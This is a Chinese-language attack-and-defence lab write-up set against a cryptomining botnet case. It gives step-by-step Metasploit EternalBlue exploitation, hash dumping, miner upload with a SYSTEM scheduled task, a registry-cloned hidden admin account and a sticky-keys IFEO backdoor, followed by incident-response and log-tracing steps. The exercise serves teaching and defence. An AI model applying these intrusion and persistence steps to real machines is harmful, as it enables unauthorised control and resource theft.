挖矿木马和后门植入的渗透测试及应急响应项目writeup

项目背景：

近年来，加密货币的迅速发展，也催生了一种全新的黑产——挖矿木马。 挖矿木马源于数字货币，利用挖矿程序获取数字货币利益。随着比特币等数字货 币交易价格的不断攀高，各类挖矿木马的身价水涨船高，数量也急剧增加。 一旦设备被入侵并被植入了挖矿木马，那便成了黑客的敛财工具。因此在短 短几年内就催生出一大批的挖矿木马家族，与之一起增加的还有对各个平台设备 的大量攻击。 2020-2023 年期间，阿 G 和阿 K 觉得虚拟币值钱，就钻研技术，编写木马程序，攻击、控制他人计算机，使 2400 余台计算机变成“肉鸡”为其“挖矿” 赚虚拟币。 2020 年 10 月开始，他对原先的木马程序进行了升级改造。在此基础上， 他先是使用自己的云服务器扫描爆破弱口令（设置简单的口令密码）服务器的远程账号和密码，获得账号密码后，远程登录对方的服务器，再使用命令将其开发的木马程序上传到服务器，实现病毒传播。接着，阿G 和阿K又使用被其控制的服务器去扫描爆破弱口令的服务器账号密码，从而控制更多的服务器。这就如传染病一样，可以感染、控制更多的计算机。 感染了由他编写木马程序后的计算机会自动下载运行“挖矿”程序，这样大 量的计算机就能被阿G 和阿K控制用于“挖矿”。

以此为背景做一次简单的初学者攻防演练

攻击方(渗透部分)：

 1. 信息收集

自查kali的ip

ifconfig

已经确定kali和靶机是在同一局域网下的，所以进行nmap扫描

nmap -sP 192.168.145.0/24

排除掉较小的1和2，较大的254，以及kali的ip131,另外俩个黑盒机器133和129，我们确定靶机的ip为192.168.145.132

ping通靶机

 确定能ping通靶机,确定是能联网的，ctrl+c结束

对靶机进行nmap扫描

 发现一些重要端口：tcp 80,tcp 139,tcp 445,tcp 3389

也可以dirb扫描一下目录

dirb http://192.168.145.132

此时信息搜集基本完成，下边进行漏洞利用

2.  漏洞利用

由于发现445端口，我们尝试注入永恒之蓝

打开metasploit

msfconsole

搜索ms17-010相关模块

search ms17-010

可以看看各个选项的意思，这里我们选择扫描模块（即1模块）

use auxiliary/scanner/smb/smb_ms17_010

 也可以是

use 1

 

 查看配置选项

show options

 其中，required列表下为yes的元组是必填选项,no则可以不填

我们发现RHOSTS需要填入，即靶机地址需要填入

set rhosts 192.168.145.132

开始扫描漏洞，再次证实靶机存在MS17-010漏洞

exploit

 

 现在使用永恒之蓝攻击模块攻击，即使用2模块：exploit/windows/smb/ms17_010_eternalblue
 

use exploit/windows/smb/ms17_010_eternalblue

或

use 2

 提示配置路径，这里就用默认配置就行

同样查看配置选项并进行配置

 输入exploit开始攻击

渗透成功

shell打开会话进行后渗透

出现乱码，输入

chcp 65001

调整回正确的显示

退出用户，利用永恒之蓝提取系统用户和密码hash值

run post/windows/gather/hashdump

 找解码工具进行解码

 获取到

用户名:xioanan$

密码:w123456!

ps查看进程:

抓图，实时监控

 能整的花东西还有很多

我们现在先干正事，上传木马过去

 选定一个Administrator目标文件夹存放木马,上传成功

 再用上边的方法建立shell创造一个system计划任务，每一分钟执行一次javs.exe

shell

chcp 65001

schtasks /create /tn system /sc minute /mo 1 /tr C:\Users\Administrator\Downloads\wkbd\javs.exe  /ru system /f

 

system计划任务建立成功

3.后门植入

进入shell,创建新账户

net user akk$ Hacker123! /add

新用户升级为管理员权限

net localgroup Administrators akk$ /add

这时如果登录靶机会发现用户已经创建成功且已经在管理员组中

退出shell，启动远程桌面

run post/windows/manage/enable_rdp

使用远程桌面一般配合查看远程用户的空闲时长

idletime

 使用rdesktop远程连接桌面

rdesktop 192.168.145.132

使用刚创建的akk$登入

用户隐藏

win->运行,输入regedit打开注册表

HKEY_LOACL_MACHINE/SAM/Domains/Account/Users/Names,分别选择Administrator用户和akk$用户，查看对应值，

 

然后在Users下可以找到对应文件

 

从对应的000001F4中打开F复制值，粘贴到akk$对应000003E8的F值里 

 

 (这是粘贴后的结果图)

将akk$和000003E8右击导出（随便一个地方，自己找的到就行）

删除akk$用户，

再点击刚刚导出的俩个文件，会自动导入注册表

导入后完成用户隐藏

权限维持——shift粘滞键后门

1.粘滞键的启动程序在 C 盘的 Windows/system32 目录下，为 sethc.exe。所以我们打开注册表，定位到以下路径： HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption

2、在目录中新建一个 sethc.exe 的子项，并添加一个新键 debugger，debugger 的对应键值为 cms 的路径。 cmd 路径：C:\Windows\system32\cmd.exe

防守方:

1. 应急响应

 发现一段时间内cpu占用率很高且一直在访问域名:mine.c3pool.com.13333

微步在线查看域名:mine.c3pool.com

 发现是矿池域名，服务器中了wakuang病毒

 在任务管理器里找到挖矿程序javs.exe,结束掉

但结束掉程序几分钟后，javs.exe程序又出现了，并且消耗极大cpu和内存，怀疑可能存在计划任务

查看计划任务表

win->管理工具->任务计划表

 发现果然存在计划任务，我们右击结束掉计划任务，为保险起见，我们在任务管理器中右击该挖矿进程，找到文件位置

我们在文件中找到一个config.json文件，打开看看

再次证实是wakuang病毒，保留有用信息后删除文件夹

 之后继续观察，发现计划任务果然没有重复

2.后门排查

使用Autoruns工具查看服务器所有的进程

点击everything，其中粉红色为可疑进程经过排查

经过排查，均不是恶意进程，服务器恶意程序均已排除 

点击logon，观察启动项

未发现异常

点击scheduled tasks ,查看计划任务

未发现异常，之前的system计划任务已经被删除

点击services，查看服务

未发现异常 

点击image，查看镜像劫持

 发现了shift粘滞键后门，后门路径是C:\windows\system32\cmd.exe,可以在不登录服务器的情况下用粘滞键以管理员权限打开cmd终端

查看隐藏账号

通过控制面板->用户账号->管理账户 查看账户信息

这里会发现看不到之前创建的隐藏账户，但是同上的方法打开注册表，是能够看到账号信息的

3. 事件溯源

 查看wakuang病毒计划任务创建时间

在之前的任务计划上可以看到较多信息

排查安全日志

提取安全日志

下载好evtx程序，使用evtx提取系统的日志，在服务器下载evtx,以管理员身份运行evtx_0x64文件(根据系统多少位判断用哪一个）中的evtx.exe项

 运行之后日志提取到了上上一级evtx目录

 分析安全日志

使用windows日志分析工具logon分析日志

下载好工具

将提取出来的日志，放在logon下的data里面（注意需要把之前的data内容清空）

之后运行bin目录下的Run.bat程序

 

 再次打开data,发现内容改变，已经变成统计结束的各种表单

查看4625.csv文件，此文件记录的是所有登录失败的信息

 发现7月12日有黑客爆破Administrator账户，但是均没有记录攻击ip

查看4624.csv文件，此文件记录的是所有登录成功的信息

 发现攻击ip 192.168.145.131 成功登录服务器

通过win->管理工具->事件查看器查看（这也是另一种查看日志的方法）

 发现黑客利用administrator账户创建了隐藏账户agg$

 之后将agg$隐藏账户添加到超级管理员组，具有超级管理员权限

 发现有端倪的域名通过微步在线没有发现更多信息

还可以仔细观察日志获取更多信息，本文不再列举